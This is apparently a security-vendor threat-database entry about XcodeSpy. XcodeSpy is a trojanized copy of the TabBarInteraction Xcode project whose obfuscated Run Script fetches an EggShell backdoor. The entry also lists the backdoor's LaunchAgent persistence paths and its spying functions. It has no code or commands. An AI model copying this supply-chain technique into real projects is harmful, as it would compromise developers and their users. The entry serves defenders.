Threat Database Mac Malware XcodeSpy Malware

XcodeSpy Malware

Cybercriminals have been observed to shift towards launching supply-chain attacks steadily, as this threatening campaign allows them to reach numerous potential victims while having to compromise a singular initial entity. The infosec researchers have uncovered an attack campaign launched against Apple developers. The threat actors exploit the Run Script feature available in Apple's Xcode IDE to spread a Trojanized Xcode Project. The name given to the new threat is XcodeSpy malware.

XcodeSpy is a threatening Xcode project that is designed to establish an EggShell backdoor onto the compromised macOS system while also creating a persistent mechanism to ensure its prolonged presence there. The hackers injected the XcodeSpy malware into a legitimate open-source project called TabBarInteraction that is available on GitHub. The legit TabBarInteraction Xcode project gives developers access to advanced features when animating the iOS Tab Bar and its interaction with the user. 

The threatening version carrying XcodeSpy, however, has been tweaked to execute an obfuscated Run Script that is initiated whenever the developer's build target is launched. In turn, the corrupted scrip contacts the Command-and-Control (C2, C&C) infrastructure set up by the attackers and fetches a custom variant of the EggShell backdoor. Upon its execution, the first action of the backdoor is to create a persistence mechanism. It will drop a LauncherAgent in one of two locations - 

~/Library/LaunchAgents/com.apple.usagestatistics.plist or ~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist.

The 'plist' will perform a check to determine whether the original executable is running. If the result is negative, it will fetch and execute a copy of the file from a so-called 'master' version located at ~/Library/Application Support/com.apple.AppStore/.update.

The EggShell backdoor will then proceed to initiate its main functionality - spying on the targeted victim. The threat can create recordings from the user's microphone, camera and keyboard. All collected data will be exfiltrated to a remote server. The backdoor also allows the threat actor to drop additional files onto the compromised system

While the techniques employed by XcodeSpy are not that sophisticated, they could be replicated to run compromised scripts in any shared Xcode project easily. Apple developers are advised to check any third-party Xcode project they plan to adopt for the presence of suspicious or threatening Run Scripts. 

Trending

Most Viewed

Loading...